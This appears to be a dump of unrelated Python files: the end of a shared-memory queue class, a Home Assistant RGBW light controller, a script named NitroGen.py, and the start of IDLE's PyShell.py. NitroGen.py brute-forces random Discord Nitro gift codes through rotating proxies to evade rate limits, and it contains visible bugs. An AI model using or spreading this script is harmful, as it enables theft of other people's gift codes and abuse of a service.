bool = deadlock_check self.deadlock_immanent_check: bool = deadlock_immanent_check self.watermark_check: bool = watermark_check self.chunk_watermark: int = 0 self.mid_counter: int = 0 self.producer_lock = ctx.Lock() self.free_list_lock = ctx.Lock() self.msg_list_lock = ctx.Lock() self.use_semaphores: bool = use_semaphores if not use_semaphores: # Put the None case first to make mypy happier. self.free_list_semaphore: typing.Optional[typing.Any] = None # TODO: what is the type returned by ctx.Semaphore(0)? self.msg_list_semaphore: typing.Optional[typing.Any] = None else: self.free_list_semaphore = ctx.Semaphore(0) self.msg_list_semaphore = ctx.Semaphore(0) self.list_heads: SharedMemory = SharedMemory(create=True, size=self.__class__.LIST_HEAD_SIZE * 2) self.init_list_head(self.__class__.FREE_LIST_HEAD) self.init_list_head(self.__class__.MSG_LIST_HEAD) self.block_locks: typing.List[typing.Any] = [ctx.Lock()] * maxsize # TODO: what is the type returned by ctx.Lock()? self.data_blocks: typing.List[SharedMemory] = [] block_id: int for block_id in range(maxsize): self.data_blocks.append(SharedMemory(create=True, size=self.__class__.META_BLOCK_SIZE + self.chunk_size)) self.add_free_block(block_id) def __getstate__(self): """This routine retrieves queue information when forking a new process.""" return (self.qid, self.verbose, self.chunk_size, self.maxsize, dill.dumps(self.serializer), self.integrity_check, self.deadlock_check, self.deadlock_immanent_check, self.watermark_check, self.chunk_watermark, self.mid_counter, self.producer_lock, self.free_list_lock, self.msg_list_lock, self.use_semaphores, self.free_list_semaphore, self.msg_list_semaphore, dill.dumps(self.list_heads), self.block_locks, dill.dumps(self.data_blocks)) def __setstate__(self, state): """This routine saves queue information when forking a new process.""" (self.qid, self.verbose, self.chunk_size, self.maxsize, self.serializer, self.integrity_check, self.deadlock_check, self.deadlock_immanent_check, self.watermark_check, self.chunk_watermark, self.mid_counter, self.producer_lock, self.free_list_lock, self.msg_list_lock, self.use_semaphores, self.free_list_semaphore, self.msg_list_semaphore, self.list_heads, self.block_locks, self.data_blocks) = state self.list_heads = dill.loads(self.list_heads) self.data_blocks = dill.loads(self.data_blocks) self.serializer = dill.loads(self.serializer) def get_list_head_field(self, lh: int, type_: str)->int: """int: Get a field from a list head. Args: lh (int): The index of the list head in the list head shared memory. type (str): The name of the list head field.""" addr_s: typing.Optional[int] addr_e: typing.Optional[int] ctype: typing.Optional[str] addr_s, addr_e, ctype = self.__class__.LIST_HEAD_STRUCT.get(type_, (None, None, None)) if addr_s is None or addr_e is None or ctype is None: raise ValueError("get_list_head_field: unrecognized %s" % repr(type_)) return struct.unpack(ctype, self.list_heads.buf[(self.__class__.LIST_HEAD_SIZE * lh) + addr_s : (self.__class__.LIST_HEAD_SIZE * lh) + addr_e])[0] def set_list_head_field(self, lh: int, data: int, type_: str): addr_s: typing.Optional[int] addr_e: typing.Optional[int] ctype: typing.Optional[str] addr_s, addr_e, ctype = self.__class__.LIST_HEAD_STRUCT.get(type_, (None, None, None)) if addr_s is None or addr_e is None or ctype is None: raise ValueError("get_list_head_field: unrecognized %s" % repr(type_)) # TODO: find a better way to calm mypy's annoyance at the following: self.list_heads.buf[(self.__class__.LIST_HEAD_SIZE * lh) + addr_s : (self.__class__.LIST_HEAD_SIZE * lh) + addr_e] = struct.pack(ctype, data) #type: ignore def get_meta(self, block: SharedMemory, type_: str)->typing.Union[bytes, int]: """typing.Union[bytes, int]: Get a field from a block's metadata area in shared memory. Args: block (SharedMemory): The shared memory for the data block. type_ (str): The name of the metadata field to extract.""" addr_s: typing.Optional[int] addr_e: typing.Optional[int] ctype: typing.Optional[str] addr_s, addr_e, ctype = self.__class__.META_STRUCT.get(type_, (None, None, None)) if addr_s is None or addr_e is None or ctype is None: raise ValueError("get_meta: unrecognized %s" % repr(type_)) return struct.unpack(ctype, block.buf[addr_s : addr_e])[0] def set_meta(self, block: SharedMemory, data, type_: str): addr_s: typing.Optional[int] addr_e: typing.Optional[int] ctype: typing.Optional[str] addr_s, addr_e, ctype = self.__class__.META_STRUCT.get(type_, (None, None, None)) if addr_s is None or addr_e is None or ctype is None: raise ValueError("set_meta: unrecognized %s" % repr(type_)) # TODO: find a better way to calm mypy's annoyance at the following: block.buf[addr_s : addr_e] = struct.pack(ctype, data) #type: ignore def get_data(self, block: SharedMemory, data_size: int)->bytes: """bytes: Get a memoryview of the a shared memory data block. Args: block (SharedMemory): The chared memory block. data_size (int): The number of bytes in the returned memoryview slice.""" return block.buf[self.__class__.META_BLOCK_SIZE:self.__class__.META_BLOCK_SIZE+data_size] def set_data(self, block: SharedMemory, data: bytes, data_size: int): # TODO: find a better way to calm mypy's annoyance at the following: block.buf[self.__class__.META_BLOCK_SIZE:self.__class__.META_BLOCK_SIZE+data_size] = data # type: ignore def init_list_head(self, lh: int): """Initialize a block list, clearing the block count and setting the first_block and last_block fields to the reserved value that indicates that they are void pointers. Args: lh (int): The index of the list head in the list head shared memory area.""" self.set_list_head_field(lh, 0, 'block_count') self.set_list_head_field(lh, self.__class__.RESERVED_BLOCK_ID, 'first_block') self.set_list_head_field(lh, self.__class__.RESERVED_BLOCK_ID, 'last_block') def get_block_count(self, lh: int)->int: """int: Get the count of blocks queued in a block list. Args: lh (int): The index of the list head in the list head shared memory area. """ return self.get_list_head_field(lh, 'block_count') def get_first_block(self, lh: int)->typing.Optional[int]: """Get the first block on a block list, updating the list head fields. Args: lh (int): The index of the list head in the list head shared memory area. Returns: None: No block is available int: The block_id of the first available block. """ block_count: int = self.get_block_count(lh) if block_count == 0: return None block_id: int = self.get_list_head_field(lh, 'first_block') block_count -= 1 if block_count == 0: self.init_list_head(lh) else: with self.block_locks[block_id]: maybe_next_block_id: typing.Union[bytes, int] = self.get_meta(self.data_blocks[block_id], 'next_block_id') if isinstance(maybe_next_block_id, int): next_block_id: int = maybe_next_block_id else: raise ValueError("get_first_block internal error: next_block_id is not int.") self.set_list_head_field(lh, next_block_id, 'first_block') self.set_list_head_field(lh, block_count, 'block_count') return block_id def add_block(self, lh: int, block_id: int): """Add a block to a block list. Args: lh (int): The index of the list head in the list head shared memory area. """ block_count: int = self.get_list_head_field(lh, 'block_count') if block_count == 0: self.set_list_head_field(lh, block_id, 'first_block') self.set_list_head_field(lh, block_id, 'last_block') self.set_list_head_field(lh, 1, 'block_count') else: last_block: int = self.get_list_head_field(lh, 'last_block') with self.block_locks[last_block]: self.set_meta(self.data_blocks[last_block], block_id, 'next_block_id') self.set_list_head_field(lh, block_id, 'last_block') self.set_list_head_field(lh, block_count + 1, 'block_count') def get_free_block_count(self)->int: """int: Get the number of free blocks.""" with self.free_list_lock: return self.get_block_count(self.__class__.FREE_LIST_HEAD) def get_first_free_block(self, block: bool, timeout: typing.Optional[float])->typing.Optional[int]: """Get the first free block. When using semaphores, optionally block with an optional timeout. If you choose to block without a timeout, the method will not return until a free block is available. Args: block (bool): When True, and when using semaphores, wait until an free block is available or a timeout occurs. timeout (typing.Optional[float]): When block is True and timeout is positive, block for at most timeout seconds attempting to acquire the free block. Returns: None: No block is available int: The block_id of the first available block. """ if self.free_list_semaphore is not None: self.free_list_semaphore.acquire(block=block, timeout=timeout) with self.free_list_lock: return self.get_first_block(self.__class__.FREE_LIST_HEAD) def add_free_block(self, block_id: int): """Return a block to the free block list. Args: block_id (int): The identifier of the block being returned. """ with self.free_list_lock: self.add_block(self.__class__.FREE_LIST_HEAD, block_id) if self.free_list_semaphore is not None: self.free_list_semaphore.release() def get_msg_count(self)->int: """int: Get the number of messages on the message list.""" with self.msg_list_lock: return self.get_block_count(self.__class__.MSG_LIST_HEAD) def get_first_msg(self, block: bool, timeout: typing.Optional[float])->typing.Optional[int]: """Take the first available message, if any, from the available message list. When using semaphores, optionally block with an optional timeout. If you choose to block without a timeout, the method will not return until a free block is available. Args: block (bool): When True, and when using semaphores, wait until an message is available or a timeout occurs. timeout (typing.Optional[float]): When block is True and timeout is positive, block for at most timeout seconds attempting to acquire the message. Returns: None: No message is available int: The block_id of the first chunk of the first available message. """ if self.msg_list_semaphore is not None: self.msg_list_semaphore.acquire(block=block, timeout=timeout) with self.msg_list_lock: return self.get_first_block(self.__class__.MSG_LIST_HEAD) def add_msg(self, block_id: int): """Add a message to the available message list Args: block_id (int): The block identifier of the first chunk of the message. """ with self.msg_list_lock: self.add_block(self.__class__.MSG_LIST_HEAD, block_id) if self.msg_list_semaphore is not None: self.msg_list_semaphore.release() def generate_msg_id(self)->bytes: """bytes: Generate the next message identifier, but do not consume it. Note: Message IDs are assigned independenyly by each process using the queue. They need to be paired with the source process ID to be used to identify a message for debugging. """ return ("%012x" % (self.mid_counter + 1)).encode('utf-8') def consume_msg_id(self): """Consume a message identifier. Note: Message identifiers are consumed when we are certain that we can process the message. They will not be consumed if we start to process a message but fail due to a conition such as insufficient free buffers. """ self.mid_counter += 1 def next_writable_block_id(self, block: bool, timeout: typing.Optional[float], msg_id: bytes, src_pid: int)->int: """int: Get the block ID of the first free block. Get the block ID of the first free block, supporting blocking/nonblocking modes and timeouts when blocking, even when semaphores are not being used. Store int he block's metadata area the message ID for the message we are building and the pid of the process acquiring the block. Args: block (bool): When True, and when using semaphores, wait until an free block is available or a timeout occurs. timeout (typing.Optional[float]): When block is True and timeout is positive, block for at most timeout seconds attempting to acquire the free block. msg_id (bytes): The message ID assigned to the message being built. src_pid: The process ID (pid) of the process that is acquiring the block. Raises: queue.Full: No block is available. Full is raised immediately in nonblocking mode, or after the timeout in blocking mode when a timeout is specified. """ looped: bool = False loop_cnt: int = 0 time_start = time.time() while True: remaining_timeout: typing.Optional[float] = timeout if remaining_timeout is not None: remaining_timeout -= (time.time() - time_start) if remaining_timeout <= 0: if self.verbose: print("next_writable_block_id: qid=%d src_pid=%d: queue FULL (timeout)" % (self.qid, src_pid), file=sys.stderr, flush=True) # *** raise Full block_id: typing.Optional[int] = self.get_first_free_block(block, remaining_timeout) if block_id is not None: break if not block: if self.verbose: print("next_writable_block_id: qid=%d src_pid=%d: FULL (nonblocking)" % (self.qid, src_pid), file=sys.stderr, flush=True) # *** raise Full if self.deadlock_check or self.verbose: loop_cnt += 1 if (self.verbose and loop_cnt == 2) or (self.deadlock_check and loop_cnt % 10000 == 0): looped = True print("next_writable_block_id: qid=%d src_pid=%d: looping (%d loops)" % (self.qid, src_pid, loop_cnt), file=sys.stderr, flush=True) # *** if looped: print("next_writable_block_id: qid=%d src_pid=%d: looping ended after %d loops." % (self.qid, src_pid, loop_cnt), file=sys.stderr, flush=True) # *** with self.block_locks[block_id]: data_block = self.data_blocks[block_id] self.set_meta(data_block, msg_id, 'msg_id') self.set_meta(data_block, src_pid, 'src_pid') return block_id def next_readable_msg(self, block: bool, timeout: typing.Optional[float]=None)->typing.Tuple[int, bytes, int, int, int]: """Get the next available message, with blocking and timeouts. This method returns a 5-tuple: the data block and certain metadata. The reason for this complexity is to retrieve the metadata under a single access lock. Args: block (bool): When True, and when using semaphores, wait until an free block is available or a timeout occurs. timeout (typing.Optional[float]): When block is True and timeout is positive, block for at most timeout seconds attempting to acquire the free block. Returns: src_pid (int): The process iodentifier of the process that originated the message. msg_id (bytes): The messag identifier. block_id (int): The identifier for the first chunk in the message. total_chunks (int): The total number of chunks in the message. next_chunk_block_id (int): The identifier for the next chunk in the message. Raises: queue.Empty: no messages are available and either nonblocking mode or a timeout occured. ValueError: An internal error occured in accessing the message's metadata. """ i = 0 time_start = time.time() while True: remaining_timeout: typing.Optional[float] = timeout if remaining_timeout is not None: remaining_timeout -= (time.time() - time_start) if remaining_timeout <= 0: raise Empty block_id: typing.Optional[int] = self.get_first_msg(block=block, timeout=remaining_timeout) if block_id is not None: break if not block: raise Empty with self.block_locks[block_id]: data_block = self.data_blocks[block_id] src_pid: typing.Union[bytes, int] = self.get_meta(data_block, 'src_pid') msg_id: typing.Union[bytes, int] = self.get_meta(data_block, 'msg_id') total_chunks: typing.Union[bytes, int] = self.get_meta(data_block, 'total_chunks') next_chunk_block_id: typing.Union[bytes, int] = self.get_meta(data_block, 'next_chunk_block_id') if isinstance(src_pid, int) and isinstance (msg_id, bytes) and isinstance(total_chunks, int) and isinstance(next_chunk_block_id, int): return src_pid, msg_id, block_id, total_chunks, next_chunk_block_id else: raise ValueError("next_readable_msg: internal error extracting data block metadata.") # def debug_data_block(self): # for b in self.data_blocks: # print(bytes(b.buf[0:24])) def put(self, msg: typing.Any, block: bool=True, timeout: typing.Optional[float]=None): """ Put an object into a shared memory queue. Args: msg (obj): The object which is to be put into queue. block (bool, optional): If it is set to True (default), it will return after an item is put into queue. timeout (int, optional): A positive integer for the timeout duration in seconds, which is only effective when `block` is set to True. Raises: queue.Full: Raised if the call times out or the queue is full when `block` is False. ValueError: An internal error occured in accessing the message's metadata. ValueError: A request was made to send a message that, when serialized, exceeds the capacity of the queue. PicklingError: This exception is raised when the serializer is pickle and an error occured in serializing the message. UnpicklingError: This exception is raised when the serializer is pickle and an error occured in deserializing the message for an integrity check. Note: - Errors other then PicklingError might be raised if a serialized other then pickle is specified. """ if timeout is not None: if not block: raise ValueError("A timeout is allowed only when not blocking.") if timeout < 0: raise Full msg_id: bytes = self.generate_msg_id() src_pid: int = os.getpid() msg_body: bytes = self.serializer.dumps(msg) # type: ignore[union-attr] if self.integrity_check: total_msg_size: int = len(msg_body) msg2: typing.Any = self.serializer.loads(msg_body) # type: ignore[union-attr] if self.verbose: print("put: qid=%d src_pid=%d msg_id=%r: serialization integrity check is OK." % (self.qid, src_pid, msg_id), file=sys.stderr, flush=True) # *** total_chunks: int = math.ceil(len(msg_body) / self.chunk_size) if self.verbose: print("put: qid=%d src_pid=%d msg_id=%r: total_chunks=%d len(msg_body)=%d chunk_size=%d" % (self.qid, src_pid, msg_id, total_chunks, len(msg_body), self.chunk_size), file=sys.stderr, flush=True) # *** if self.watermark_check or self.verbose: if total_chunks > self.chunk_watermark: print("put: qid=%d src_pid=%d msg_id=%r: total_chunks=%d maxsize=%d new watermark" % (self.qid, src_pid, msg_id, total_chunks, self.maxsize), file=sys.stderr, flush=True) # *** self.chunk_watermark = total_chunks if self.deadlock_immanent_check and total_chunks > self.maxsize: raise ValueError("DEADLOCK IMMANENT: qid=%d src_pid=%d: total_chunks=%d > maxsize=%d" % (self.qid, src_pid, total_chunks, self.maxsize)) time_start: float = time.time() # We acquire the producer lock to avoid deadlock if multiple # producers need multiple chunks each. lock_acquired: bool = self.producer_lock.acquire(timeout=timeout) if not lock_acquired: # We must have timed out. if self.verbose: print("put: qid=%d src_pid=%d msg_id=%r: queue FULL" % (self.qid, src_pid, msg_id), file=sys.stderr, flush=True) # *** raise Full block_id: int block_id_list: typing.List[int] = [ ] try: # In case we will process more than one chunk and this is a # nonblocking or timed out request, start by reserving all the # blocks that we will need. i: int for i in range(total_chunks): try: remaining_timeout: typing.Optional[float] = timeout if remaining_timeout is not None: remaining_timeout -= (time.time() - time_start) if remaining_timeout <= 0: if self.verbose: print("put: qid=%d src_pid=%d msg_id=%r: queue FULL" % (self.qid, src_pid, msg_id), file=sys.stderr, flush=True) # *** raise Full block_id = self.next_writable_block_id(block, remaining_timeout, msg_id, src_pid) block_id_list.append(block_id) except Full: # We failed to find a free block and/or a timeout occured. # Release the reserved blocks. if self.verbose: print("put: qid=%d src_pid=%d msg_id=%r: releasing %d blocks" % (self.qid, src_pid, msg_id, len(block_id_list)), file=sys.stderr, flush=True) # *** for block_id in block_id_list: self.add_free_block(block_id) raise finally: # Now that we have acquired the full set of chunks, we can release # the producer lock. We don't want to hold it while we transfer # data into the blocks. if self.verbose: print("put: qid=%d src_pid=%d msg_id=%r: releasing producer lock" % (self.qid, src_pid, msg_id), file=sys.stderr, flush=True) # *** self.producer_lock.release() # Consume this message ID. self.consume_msg_id() if self.verbose: print("put: qid=%d src_pid=%d msg_id=%r: acquired %d blocks" % (self.qid, src_pid, msg_id, total_chunks), file=sys.stderr, flush=True) # *** # Now that we have a full set of blocks, build the # chunks: block_idx: int for block_idx, block_id in enumerate(block_id_list): chunk_id = block_idx + 1 if self.verbose: print("put: qid=%d src_pid=%d msg_id=%r: chunk_id=%d of total_chunks=%d" % (self.qid, src_pid, msg_id, chunk_id, total_chunks), file=sys.stderr, flush=True) # *** data_block: SharedMemory = self.data_blocks[block_id] chunk_data: bytes = msg_body[block_idx * self.chunk_size: (block_idx + 1) * self.chunk_size] msg_size: int = len(chunk_data) if self.verbose: print("put: qid=%d src_pid=%d msg_id=%r: chunk_id=%d: block_id=%d msg_size=%d." % (self.qid, src_pid, msg_id, chunk_id, block_id, msg_size), file=sys.stderr, flush=True) # *** if self.integrity_check: checksum: int = zlib.adler32(chunk_data) if self.verbose: print("put: qid=%d src_pid=%d msg_id=%r: chunk_id=%d: checksum=%x total_msg_size=%d" % (self.qid, src_pid, msg_id, chunk_id, checksum, total_msg_size), file=sys.stderr, flush=True) # *** with self.block_locks[block_id]: self.set_meta(data_block, msg_id, 'msg_id') self.set_meta(data_block, msg_size, 'msg_size') self.set_meta(data_block, chunk_id, 'chunk_id') self.set_meta(data_block, total_chunks, 'total_chunks') if self.integrity_check: self.set_meta(data_block, total_msg_size, 'total_msg_size') self.set_meta(data_block, checksum, 'checksum') if chunk_id == total_chunks: # No more chunks, store a reserved value to simplify debugging. self.set_meta(data_block, self.__class__.RESERVED_BLOCK_ID, 'next_chunk_block_id') else: # Store the block ID of the next chunk. self.set_meta(data_block, block_id_list[block_idx + 1], 'next_chunk_block_id') self.set_data(data_block, chunk_data, msg_size) # Now that the entire message has built, queue it: self.add_msg(block_id_list[0]) if self.verbose: print("put: qid=%d src_pid=%d msg_id=%r: message sent" % (self.qid, src_pid, msg_id), file=sys.stderr, flush=True) # *** def get(self, block: bool=True, timeout: typing.Optional[float]=None)->typing.Any: """ Get the next available message from the queue. Args: block (bool, optional): If it is set to True (default), it will only return when an item is available. timeout (int, optional): A positive integer for the timeout duration in seconds, which is only effective when `block` is set to True. Returns: object: A message object retrieved from the queue. Raises: queue.Empty: This exception will be raised if it times out or queue is empty when `block` is False. ValueError: An internal error occured in accessing the message's metadata. UnpicklingError: This exception is raised when the serializer is pickle and an error occured in deserializing the message. Note: - Errors other then UnpicklingError might be raised if a serialized other then pickle is specified. """ time_start: float = time.time() # We will build a list of message chunks. We can't # release them until after we deserialize the data. block_id: int chunk_id: int msg_block_ids: typing.List[int] = [ ] data_block: SharedMemory try: remaining_timeout: typing.Optional[float] = timeout if remaining_timeout is not None: remaining_timeout -= (time.time() - time_start) if remaining_timeout <= 0: if self.verbose: print("put: qid=%d src_pid=%d msg_id=%r: queue EMPTY" % (self.qid, src_pid, msg_id), file=sys.stderr, flush=True) # *** raise Empty src_pid: int msg_id: bytes total_chunks: int next_chunk_block_id: int src_pid, msg_id, block_id, total_chunks, next_chunk_block_id = self.next_readable_msg(block, remaining_timeout) # This call might raise Empty. if self.verbose: print("get: qid=%d src_pid=%d msg_id=%r: total_chunks=%d next_chunk_block_id=%d." % (self.qid, src_pid, msg_id, total_chunks, next_chunk_block_id), file=sys.stderr, flush=True) # *** msg_block_ids.append(block_id) # Acquire the chunks for the rest of the message: i: int for i in range(1, total_chunks): chunk_id = i + 1 if self.verbose: print("get: qid=%d src_pid=%d msg_id=%r: chunk_id=%d: block_id=%d." % (self.qid, src_pid, msg_id, chunk_id, next_chunk_block_id), file=sys.stderr, flush=True) # *** msg_block_ids.append(next_chunk_block_id) data_block = self.data_blocks[next_chunk_block_id] with self.block_locks[next_chunk_block_id]: maybe_next_chunk_block_id: typing.Union[bytes, int] = self.get_meta(data_block, 'next_chunk_block_id') if isinstance(maybe_next_chunk_block_id, int): next_chunk_block_id = maybe_next_chunk_block_id else: raise ValueError("get: internal error getting next_chunk_block_id") except Exception: # Release the data blocks (losing the message) if we get an # unexpected exception: if self.verbose: print("put: qid=%d: releasing data blocks due to Exception" % self.qid, file=sys.stderr, flush=True) # *** for block_id in msg_block_ids: self.add_free_block(block_id) msg_block_ids.clear() raise buf_msg_body: typing.List[bytes] = [] try: block_idx: int for block_idx, block_id in enumerate(msg_block_ids): chunk_id = block_idx + 1 data_block = self.data_blocks[block_id] with self.block_locks[block_id]: maybe_msg_size: typing.Union[bytes, int] = self.get_meta(data_block, 'msg_size') if isinstance(maybe_msg_size, int): msg_size: int = maybe_msg_size else: raise ValueError("get: internal error getting msg_size") if self.integrity_check: if block_idx == 0: maybe_total_msg_size: typing.Union[bytes, int] = self.get_meta(data_block, 'total_msg_size') if isinstance(maybe_total_msg_size, int): total_msg_size: int = maybe_total_msg_size else: raise ValueError("set: internal errpor getting total_msg_size") maybe_checksum: typing.Union[bytes, int] = self.get_meta(data_block, 'checksum') if isinstance(maybe_checksum, int): checksum: int = maybe_checksum else: raise ValueError("get: internal error getting checksum") chunk_data: bytes = self.get_data(data_block, msg_size) # This may make a reference, not a deep copy. if self.verbose: print("get: qid=%d src_pid=%d msg_id=%r: chunk_id=%d: block_id=%d msg_size=%d total_chunks=%d." % (self.qid, src_pid, msg_id, chunk_id, block_id, msg_size, total_chunks), file=sys.stderr, flush=True) # *** if self.integrity_check: checksum2: int = zlib.adler32(chunk_data) if checksum == checksum2: if self.verbose: print("get: qid=%d src_pid=%d msg_id=%r: chunk_id=%d: checksum=%x is OK" % (self.qid, src_pid, msg_id, chunk_id, checksum), file=sys.stderr, flush=True) # *** else: raise ValueError("ShmQueue.get: qid=%d src_pid=%d msg_id=%r: chunk_id=%d: block_id=%d checksum=%x != checksum2=%x -- FAIL!" % (self.qid, src_pid, msg_id, chunk_id, block_id, checksum, checksum2)) # TODO: use a better exception buf_msg_body.append(chunk_data) # This may copy the reference. msg_body: bytes = b''.join(buf_msg_body) # Even this might copy the references. if self.integrity_check: if total_msg_size == len(msg_body): if self.verbose: print("get: qid=%d src_pid=%d msg_id=%r: total_msg_size=%d is OK" % (self.qid, src_pid, msg_id, total_msg_size), file=sys.stderr, flush=True) # *** else: raise ValueError("get: qid=%d src_pid=%d msg_id=%r: total_msg_size=%d != len(msg_body)=%d -- FAIL!" % (self.qid, src_pid, msg_id, total_msg_size, len(msg_body))) # TODO: use a beter exception. try: # Finally, we are guaranteed to copy the data. msg: typing.Any = self.serializer.loads(msg_body) # type: ignore[union-attr] # We could release the blocks here, but then we'd have to # release them in the except clause, too. return msg except pickle.UnpicklingError as e: print("get: Fail: qid=%d src_pid=%d msg_id=%r: msg_size=%d chunk_id=%d total_chunks=%d." % (self.qid, src_pid, msg_id, msg_size, chunk_id, total_chunks), file=sys.stderr, flush=True) # *** if self.integrity_check: print("get: Fail: qid=%d src_pid=%d msg_id=%r: total_msg_size=%d checksum=%x" % (self.qid, src_pid, msg_id, total_msg_size, checksum), file=sys.stderr, flush=True) # *** raise finally: # It is now safe to release the data blocks. This is a good place # to release them, because it covers error paths as well as the main return. if self.verbose: print("get: qid=%d src_pid=%d msg_id=%r: releasing %d blocks." % (self.qid, src_pid, msg_id, len(msg_block_ids)), file=sys.stderr, flush=True) # *** for block_id in msg_block_ids: self.add_free_block(block_id) msg_block_ids.clear() buf_msg_body.clear() def get_nowait(self)->typing.Any: """ Equivalent to `get(False)`. """ return self.get(False) def put_nowait(self, msg: typing.Any): """ Equivalent to `put(obj, False)`. """ return self.put(msg, False) def qsize(self)->int: """int: Return the number of ready messages.""" return self.get_msg_count() def empty(self)->bool: """bool: True when no messages are ready.""" return self.get_msg_count() == 0 def full(self)->bool: """bool: True when no free blocks are available.""" return self.get_free_block_count() == 0 def close(self): """ Indicate no more new data will be added and release the shared memory areas. """ block: SharedMemory for block in self.data_blocks: block.close() block.unlink() self.list_heads.close() self.list_heads.unlink() def __del__(self): pass
zooz_rgbw_light.py
import appdaemon.plugins.hass.hassapi as hass import json from threading import Thread class ZoozRGBWLight(hass.Hass): def initialize(self): args = self.args self.light_name = args["light_name"] self.unique_id = args["unique_id"] self.entity_id = "light.{}".format(self.unique_id) self.dimmer_main = args["zooz_entities"]["main"] self.dimmer_r = args["zooz_entities"]["r"] self.dimmer_g = args["zooz_entities"]["g"] self.dimmer_b = args["zooz_entities"]["b"] self.dimmer_w = args["zooz_entities"]["w"] self.dimmer_entities = [self.dimmer_main, self.dimmer_r, self.dimmer_g, self.dimmer_b, self.dimmer_w] light_attributes = { "schema": "json", "name": self.light_name, "unique_id": self.unique_id, "icon": "mdi:led-strip-variant", "command_topic": "zooz/{id}/cmd".format(id=self.unique_id), "brightness": True, "color_mode": True, "supported_color_modes": ["rgbw"], "effect": True, "effect_list": [ "Disabled", "Fireplace", "Storm", "Rainbow", "Polar Lights", "Police" ] } # Create/Update light using mqtt discovery light_config_topic = "homeassistant/light/{id}/config".format(id=self.unique_id) self.call_service("mqtt/publish", topic=light_config_topic, payload=json.dumps(light_attributes)) self.listen_state(self.state_changed, self.entity_id, attribute="all") self.log("'{}' initialized.".format(self.entity_id)) def state_changed(self, entity, attribute, old, new, kwargs): self.log("'{}' state changed.".format(self.entity_id)) if new["state"] == 'on': effect = new['attributes'].get("effect", "Disabled") if old['state'] == 'on' and effect != old['attributes'].get("effect", "Disabled"): self.set_effect(effect) else: self.turn_on(new['attributes']) else: self.turn_off() def set_effect(self, effect): self.log("Setting effect: {}".format(effect)) value = effect.lower() if effect != "Disabled" else "preset programs disabled" self.call_service("zwave_js/set_config_parameter", entity_id=self.dimmer_main, parameter="157", value=value) def turn_on(self, attributes): state = { "brightness": attributes.get("brightness", 255), "rgbw": attributes.get("rgbw_color", [0, 0, 0, 255]), } self.log("Turning on with {}".format(state)) self.turn_on_in_thread(self.dimmer_main, state["brightness"]) self.turn_on_in_thread(self.dimmer_r, state["rgbw"][0]) self.turn_on_in_thread(self.dimmer_g, state["rgbw"][1]) self.turn_on_in_thread(self.dimmer_b, state["rgbw"][2]) self.turn_on_in_thread(self.dimmer_w, state["rgbw"][3]) def turn_on_in_thread(self, entity, brightness): Thread(target=self.call_service, args=["light/turn_on"], kwargs={"entity_id": entity, "brightness": brightness}).start() def turn_off(self): self.log("Turning off") self.call_service("light/turn_off", entity_id=self.dimmer_entities)
NitroGen.py
import requests import string import random from sys import argv, exit from threading import Thread try: caracteres = int(argv[1]) threads = int(argv[2]) proxys = argv[3] except: print('Error, Set Characters, Threads And List Proxys!!!') exit() proxys = open(proxys, r"D:\\GitHub\\NitroGenerator\\discord") proxys = proxys.readlines() def getandchk(caracteres, proxys): while True: for proxy in proxys: try: proxya = proxy.strip() proxy = {'https': proxya} header = {'user-agent': 'Mozilla/5.0'} code = ('').join(random.choices(string.ascii_letters + string.digits, k=caracteres)) url = ('https://discordapp.com/api/v6/entitlements/gift-codes/{0}?with_application=false&with_subscription_plan=true'.format(code)) r = requests.get(url=url, proxies=proxy, headers=header, timeout=24) if 'Unknown' in r.text: print('#Die', code, proxya) else: save = open('goodnitro.txt', 'a') save.write('#Live', code, proxya) save.close() print('#Live', code, proxya) except: print('#Error', code, proxya) for i in range(threads): t = Thread(target=getandchk, args=(caracteres, proxys)) t.start() t.join(0.5)
PyShell.py
#! /usr/bin/env python3 import getopt import os import os.path import re import socket import subprocess import sys import threading import time import tokenize import traceback import types import io import linecache from code import InteractiveInterpreter from platform import python_version, system try: from tkinter import * except ImportError: print("** IDLE can't import Tkinter.\n" "Your Python may not be configured for Tk. **", file=sys.__stderr__) sys.exit(1) import tkinter.messagebox as tkMessageBox from idlelib.EditorWindow import EditorWindow, fixwordbreaks from idlelib.FileList import FileList from idlelib.ColorDelegator import ColorDelegator from idlelib.UndoDelegator import UndoDelegator from idlelib.OutputWindow import OutputWindow from idlelib.configHandler import idleConf from idlelib import idlever from idlelib import rpc from idlelib import Debugger from idlelib import RemoteDebugger from idlelib import macosxSupport HOST = '127.0.0.1' # python execution server on localhost loopback PORT = 0 # someday pass in host, port for remote debug capability # Override warnings module to write to warning_stream. Initialize to send IDLE # internal warnings to the console. ScriptBinding.check_syntax() will # temporarily redirect the stream to the shell window to display warnings when # checking user's code. warning_stream = sys.__stderr__ # None, at least on Windows, if no console. import warnings def idle_formatwarning(message, category, filename, lineno, line=None): """Format warnings the IDLE way.""" s = "\nWarning (from warnings module):\n" s += ' File \"%s\", line %s\n' % (filename, lineno) if line is None: line = linecache.getline(filename, lineno) line = line.strip() if line: s += " %s\n" % line s += "%s: %s\n" % (category.__name__, message) return s def idle_showwarning( message, category, filename, lineno, file=None, line=None): """Show Idle-format warning (after replacing warnings.showwarning). The differences are the formatter called, the file=None replacement, which can be None, the capture of the consequence AttributeError, and the output of a hard-coded prompt. """ if file is None: file = warning_stream try: file.write(idle_formatwarning( message, category, filename, lineno, line=line)) file.write(">>> ") except (AttributeError, OSError): pass # if file (probably __stderr__) is invalid, skip warning. _warnings_showwarning = None def capture_warnings(capture): "Replace warning.showwarning with idle_showwarning, or reverse." global _warnings_showwarning if capture: if _warnings_showwarning is None: _warnings_showwarning = warnings.showwarning warnings.showwarning = idle_showwarning else: if _warnings_showwarning is not None: warnings.showwarning = _warnings_showwarning _warnings_showwarning = None capture_warnings(True) def extended_linecache_checkcache(filename=None, orig_checkcache=linecache.checkcache): """Extend linecache.checkcache to preserve the <pyshell#...> entries Rather than repeating the linecache code, patch it to save the <pyshell#...> entries, call the original linecache.checkcache() (skipping them), and then restore the saved entries. orig_checkcache is bound at definition time to the original method, allowing it to be patched. """ cache = linecache.cache save = {} for key in list(cache): if key[:1] + key[-1:] == '<>': save[key] = cache.pop(key) orig_checkcache(filename) cache.update(save) # Patch linecache.checkcache(): linecache.checkcache = extended_linecache_checkcache class PyShellEditorWindow(EditorWindow): "Regular text edit window in IDLE, supports breakpoints" def __init__(self, *args): self.breakpoints = [] EditorWindow.__init__(self, *args) self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here) self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here) self.text.bind("<<open-python-shell>>", self.flist.open_shell) self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(), 